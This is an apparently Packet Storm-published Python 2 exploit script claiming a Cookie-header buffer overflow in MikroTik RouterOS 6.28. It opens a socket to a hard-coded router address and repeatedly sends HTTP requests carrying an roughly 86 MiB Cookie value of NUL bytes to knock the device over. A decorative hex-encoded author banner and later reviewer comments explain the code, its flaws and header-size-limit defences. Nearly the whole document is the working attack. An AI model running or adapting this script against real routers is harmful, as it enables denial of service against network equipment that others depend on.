Mikrotik RouterOS 6.28 Cookie Buffer Overflow

2017-06-16T00:00:00
ID PACKETSTORM:142987
Type packetstorm
Reporter sultan albalawi
Modified 2017-06-16T00:00:00

Description

                                        
# mikrotik RouterOS v6.28 Cookie HTTP request header Buffer Overflow
# sultan albalawi  
import socket  
import sys  
from time import sleep  
def myB():
    """Print the author's banner to stdout.

    The text is kept as hex escapes, byte-for-byte as published. Decoded,
    it is decorative ASCII art with a few labels, the author's name, an
    e-mail address and two profile URLs, separated by dashed rules.
    The function touches nothing but stdout.
    """
    banner = (
        "\x27\x27\x27\x0d\x0a\x20\x20\x20\x20\x20"
        "\x20\x20\x5c\x20\x20\x20\x2d\x20\x20\x2d\x20"
        "\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e"
        "\x20\x20\x2d\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d"
        "\x20\x2d\x20\x20\x2d\x20\x2d\x20\x20\x2d\x20"
        "\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a"
        "\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c"
        "\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74"
        "\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a"
        "\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a"
        "\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20"
        "\x60\x2e\x20\x20\x20\x20\x2c\x3b\x27\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70"
        "\x50\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a"
        "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x58\x20"
        "\x2f\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20"
        "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a"
        "\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f"
        "\x60\x20\x60\x20\x28\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c"
        "\x0d\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x20"
        "\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x64"
        "\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20\x20"
        "\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74"
        "\x79\x60\x20\x20\x27\x20\x30\x20\x20\x30\x20"
        "\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a"
        "\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20"
        "\x20\x20\x20\x20\x7c\x0d\x0a\x20\x20\x20\x20"
        "\x2c\x20\x20\x20\x20\x20\x20\x20\x2c\x20\x20"
        "\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a"
        "\x2a\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20"
        "\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20"
        "\x20\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20"
        "\x20\x60\x2e\x5f\x2e\x27\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d"
        "\x5e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60\x20"
        "\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d"
        "\x2d\x2c\x2e\x2e\x5f\x3b\x2d\x2d\x2d\x3e\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20"
        "\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f"
        "\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a"
        "\x20\x20\x27\x20\x60\x20\x20\x20\x20\x2c\x20"
        "\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65"
        "\x77\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20"
        "\x20\x20\x60\x2e\x5f\x20\x2c\x20\x20\x27\x20"
        "\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x7c"
        "\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x3b\x20\x2c\x27\x27\x2d\x2c\x3b\x27\x20\x60"
        "\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f"
        "\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x60\x60"
        "\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d\x2d\x60\x20"
        "\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20"
        "\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x27\x2e\x20\x5f\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f"
        "\x5f\x5f\x20\x7c\x5f\x20\x20\x49\x50\x53\x20"
        "\x20\x20\x20\x20\x29\x0d\x0a\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20"
        "\x20\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d"
        "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x53\x75\x6c\x74\x61\x6e\x20"
        "\x41\x6c\x62\x61\x6c\x61\x77\x69\x0d\x0a\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x68\x74\x74\x70\x73"
        "\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65"
        "\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65"
        "\x6e\x74\x65\x73\x74\x33\x0d\x0a\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61"
        "\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e"
        "\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e"
        "\x63\x6f\x6d\x0d\x0a\x20\x20\x20\x20\x20\x20"
        "\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d"
        "\t\t\t\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61"
        "\x63\x6b\x65\x74\x73\x74\x6f\x72\x6d\x73\x65\x63"
        "\x75\x72\x69\x74\x79\x2e\x63\x6f\x6d\x2f\x66\x69"
        "\x6c\x65\x73\x2f\x61\x75\x74\x68\x6f\x72\x2f\x31\x32\x35\x38\x36\x2f\r\n"
        "\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
        "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d"
    )
    print banner
  
# Script body (Python 2): print the banner, open one TCP connection to a
# hard-coded address and send a hand-built HTTP request whose Cookie header
# value is a very large run of NUL bytes. The script never reads a reply, so
# it can only report that the request was sent, not what the target did.
# NOTE(review): indentation was lost in this listing. Which statements sit
# inside the `for i` loop (sleep(30), the `for re` countdown) cannot be
# recovered from the text, so the code is left exactly as published.
# Defensive note: a request carrying a multi-megabyte Cookie header is
# trivially rejected by a header-size limit on any front-end proxy, and
# exposing the device's HTTP service only to management networks limits
# who can send it at all; which RouterOS release addressed the 6.28 issue
# should be confirmed against the vendor changelog.
myB()


# Only socket creation is guarded; connect() and sendall() failures below are
# handled separately (sendall) or not at all (connect).
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error:
print 'Failed to create socket'
sys.exit()

# Target is hard-coded: host address and port 80 (the HTTP service).
host = '192.168.88.1'
port = 80


# Blocking connect with no timeout; an unreachable host raises an uncaught
# socket.error here. The socket is never closed explicitly anywhere below.
s.connect((host, port))
print 'Socket Connected to ' +host
# Catalogue of HTTP methods and header names (87 entries in this listing).
# Only len(header) and header[47] are used; the rest is informational.
# 'Location:' and 'X-Forwarded-Proto:' each appear twice.
header = ['GET /',
'CONNECT /',
'DELETE /',
'TRACE /',
'HEAD /',
'OPTIONS /',
'PATCH /',
'POST /',
'PUT /',
'Forwarded:',
'Content-Language: ',
'Location:',
'Proxy-Authenticate:',
'Proxy-Authorization:',
'Range:',
'WWW-Authenticate:',
'X-Forwarded-For:',
'X-Forwarded-Host:',
'X-Forwarded-Proto:',
'Accept:',
'Accept-Charset:',
'Accept-Encoding:',
'X-Forwarded-Proto:',
'Front-End-Https:',
'X-Forwarded-Protocol:',
'X-Forwarded-Ssl:',
'X-Url-Scheme:',
'Accept-Language:',
'Accept-Ranges:',
'Access-Control-Allow-Credentials:',
'Access-Control-Allow-Headers:',
'Access-Control-Allow-Methods:',
'Access-Control-Allow-Origin:',
'Access-Control-Expose-Headers:',
'Access-Control-Max-Age:',
'Access-Control-Request-Headers:',
'Access-Control-Request-Method:',
'Age:',
'Cache-Control:',
'Connection:',
'Content-Disposition:',
'Content-Encoding:',
'Content-Length:',
'Content-Location:',
'Content-Security-Policy:',
'Content-Security-Policy-Report-Only:',
'Content-Type:',
'Cookie:',
'Cookie2:',
'DNT:',
'Date:',
'ETag:',
'Expires:',
'From:',
'Host:',
'If-Match:',
'If-Modified-Since:',
'If-None-Match:',
'If-Range:',
'If-Unmodified-Since:',
'Keep-Alive:',
'Last-Modified:',
'Location:',
'Origin:',
'Pragma:',
'Public-Key-Pins:',
'Public-Key-Pins-Report-Only:',
'Referer:',
'Referrer-Policy:',
'Retry-After:',
'Server:',
'Set-Cookie:',
'Set-Cookie2:',
'Strict-Transport-Security:',
'TE:',
'Tk:',
'Trailer:',
'Transfer-Encoding:',
'Upgrade-Insecure-Requests:',
'User-Agent:',
'Vary:',
'Via:',
'Warning:',
'X-Content-Type-Options:',
'X-DNS-Prefetch-Control:',
'X-Frame-Options:',
'X-XSS-Protection:']
print "http_heders : ",len(header)
m=len(header)
# header[47] is 'Cookie:' -- the header name the overflow is attributed to.
print header[47] +"this vulnerability "
# One request per list entry, all written to the same socket.
for i in range(m):
# 90,590,000 NUL bytes (~86 MiB) become the Cookie value; the string is
# rebuilt on every iteration.
A="\0"*90590000
# Hand-built HTTP/1.1 request. As written, the Referer value has no scheme or
# space before the host, the Cookie name has no space before its value, and
# no empty line terminates the header block, so the oversized header is the
# last thing sent.
message=("GET /graphs/ HTTP/1.1\r\n"
"Host: "+host+"\r\n"
"Accept: */*\r\n"
"Accept-Language: en\r\n"
"User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\n"
"Connection: close\r\n"
"Referer:"+host+'/graphs\r\n'+
header[47]+"username="+A)
# The request asks for 'Connection: close'; once the peer closes, a later
# sendall() presumably fails with socket.error and the script exits.
try:
s.sendall(message)
print "send pyload ok..."
#s.sendall(message)
except socket.error:
print 'Send failed'
sys.exit()
sleep(30)
# Countdown printed after sending. The loop variable 're' shadows the stdlib
# module name; harmless here because 're' is not imported, but confusing.
for re in range(1,20):
print re
# Printed unconditionally: no response is read and no liveness check is made,
# so this message does not confirm the target's state.
print "mikrotik RouterOS v6.28 stopping"

# Response handling is commented out; nothing the target sends back is read.
#reply = s.recv(4096)
#sss=s.recv(4096)
#print reply
#print sss